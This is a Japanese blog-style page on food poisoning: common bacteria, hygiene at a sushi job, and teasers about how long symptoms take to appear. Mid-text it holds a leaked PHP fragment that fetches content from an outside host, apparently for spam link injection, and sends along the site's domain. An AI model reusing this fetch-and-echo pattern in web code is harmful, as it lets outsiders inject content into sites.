意外に怖い食べ物に潜む菌

食あたり 時間

食あたり 時間について

意外に怖い食べ物に潜む菌

画像
食あたりには私は未だになったことはないと思っているのですが、以前何もしていないのに突然お腹が貫かれたような痛みを感じたときがあり、治るのに1時間ほど要したことがありました。
ああ、多分あのような痛みに嘔吐感、熱がまざったものはとてつもなく辛いのだろうと今思っています。
食あたりを起こす菌の種類は多様ですが、O157やカンピロバクター、ブドウ球菌やサルモネラ菌などは有名であると思います。
こういったものが潜む食べ物は、肉や魚介類、飲料水や肉の加工品など、意外と私たちの身近な食べ物で普段から口にしているようなものであるとわかります。
それなのに今までそれらの食品を食べてから体に何らかの異変が起きたりだとか、そういったことは何もありませんから、もしかすると正しい調理法を知らず知らずのうちに行えていたのかもしれません。
これからも気を付けていきたいです。
寿司屋のアルバイトをしていた頃はよく手を石鹸で洗ったあと消毒液を念入りにつけさせられていましたが、その理由も、寿司は手で握るものなので一層衛生面に気をつけ食あたりを起こさないようにするためのものだったのでしょう。
".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

食あたり 時間関連情報ページ

画像

食あたりの発症時間は菌の種類で異なります

食あたりの症状は原因菌の種類で発症する時間が違ってきます。
食品内で増殖した菌の場合は潜伏期間
画像

食べてから食あたりになるまでの時間について

食あたりとは食中毒のことです。
食べ物を摂取することで体に害をなすことをさします。
食あ
画像

食あたりによる主な症状と発症までの時間

食あたりになった場合、食品を食べて症状が出るまでの時間は、原因の細菌や、食品をどのくらいの量食べたの
画像

生体内毒素型による食あたりの主な症状と発症までの時間

食あたりになった場合、潜伏期間は原因の細菌や食品を食べた量によって異なります。
感染型(生体内

更新ページ一覧